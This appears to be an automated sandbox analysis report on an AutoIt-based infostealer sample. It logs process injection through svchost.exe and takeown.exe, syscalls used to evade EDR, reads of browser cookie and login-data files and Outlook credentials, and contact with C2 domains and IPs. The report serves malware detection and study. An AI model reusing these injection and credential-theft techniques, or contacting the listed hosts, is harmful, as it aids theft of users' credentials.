                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtResumeThread: Direct from: 0x771736AC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtMapViewOfSection: Direct from: 0x77172D1C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtWriteVirtualMemory: Direct from: 0x77172E3C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtCreateMutant: Direct from: 0x771735CC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtDeviceIoControlFile: Direct from: 0x77172AEC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtAllocateVirtualMemory: Direct from: 0x77172BEC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtTerminateThread: Direct from: 0x77172FCC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtQueryInformationToken: Direct from: 0x77172CAC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtCreateFile: Direct from: 0x77172FEC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtOpenFile: Direct from: 0x77172DCC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtClose: Direct from: 0x77172B6C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtSetInformationThread: Direct from: 0x771663F9
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtAllocateVirtualMemory: Direct from: 0x77173C9C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtQueryAttributesFile: Direct from: 0x77172E6C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtSetInformationThread: Direct from: 0x77172B4C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtReadVirtualMemory: Direct from: 0x77172E8C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtCreateKey: Direct from: 0x77172C6C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtQueryVolumeInformationFile: Direct from: 0x77172F2C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtAllocateVirtualMemory: Direct from: 0x771748EC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtQuerySystemInformation: Direct from: 0x771748CC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtOpenSection: Direct from: 0x77172E0C
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\takeown.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\takeown.exe Section loaded: NULL target: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe protection: read write
                Source: C:\Windows\SysWOW64\takeown.exe Section loaded: NULL target: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\takeown.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\takeown.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\takeown.exe Thread register set: target process: 7396
                Source: C:\Windows\SysWOW64\takeown.exe Thread APC queued: target process: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 275A008
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Code function: 0_2_00FE87B1 LogonUserW, 0_2_00FE87B1
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Code function: 0_2_00F93B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00F93B3A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Code function: 0_2_00F948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00F948D7
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Code function: 0_2_00FF4C7F mouse_event, 0_2_00FF4C7F
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\arGdXDmyGJ.exe"
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
                Source: C:\Windows\SysWOW64\takeown.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FE7CAF
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FE874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00FE874B
                Source: arGdXDmyGJ.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: arGdXDmyGJ.exe, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703320569.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000000.1345531625.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492089346.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703320569.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000000.1345531625.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492089346.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703320569.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000000.1345531625.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492089346.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerW
                Source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703320569.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000000.1345531625.00000000018E1000.00000002.00000001.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492089346.0000000000F61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FB862B cpuid 0_2_00FB862B
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FC4E87
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FD1E06 GetUserNameW,0_2_00FD1E06
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00FC3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FC3F3A
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exeCode function: 0_2_00F949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F949A0

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3703646071.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1423688801.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3703690536.0000000004420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\takeown.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\takeown.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: arGdXDmyGJ.exe | Binary or memory string: WIN_81
                Source: arGdXDmyGJ.exe | Binary or memory string: WIN_XP
                Source: arGdXDmyGJ.exe | Binary or memory string: WIN_XPe
                Source: arGdXDmyGJ.exe | Binary or memory string: WIN_VISTA
                Source: arGdXDmyGJ.exe | Binary or memory string: WIN_7
                Source: arGdXDmyGJ.exe | Binary or memory string: WIN_8
                Source: arGdXDmyGJ.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3703646071.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.1423688801.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3703690536.0000000004420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_01006283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_01006283
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe | Code function: 0_2_01006747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_01006747
                MITRE ATT&CK Matrix (one tactic per column; a leading number is the report's count of matching signatures for that technique)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1634891, Sample: arGdXDmyGJ.exe, Startdate: 11/03/2025, Architecture: WINDOWS, Score: 100

                Process chain, signatures and network contacts recovered from the behavior graph:

                • Sample level: www.dolfisstillspinnin.xyz; www.sislieskort.xyz (Performs DNS queries to domains with low reputation); 8 other IPs or domains. Signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures
                • arGdXDmyGJ.exe (started): Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures
                • svchost.exe (started by arGdXDmyGJ.exe): Maps a DLL or memory area into another process
                • DKwZ8oxmXrzaXEMk9aGP.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
                • takeown.exe (started by DKwZ8oxmXrzaXEMk9aGP.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                • DKwZ8oxmXrzaXEMk9aGP.exe (injected by takeown.exe): Found direct / indirect Syscall (likely to bypass EDR). Network: kakeksakti43.cfd 198.252.98.84, ports 49720, 49721, 49722 (HAWKHOSTCA, Canada); nan21.net 93.113.54.70, ports 49700, 49701, 49702 (GTSCEGTSCentralEuropeAntelGermanyCZ, Romania); 5 other IPs or domains
                • firefox.exe (started by takeown.exe)
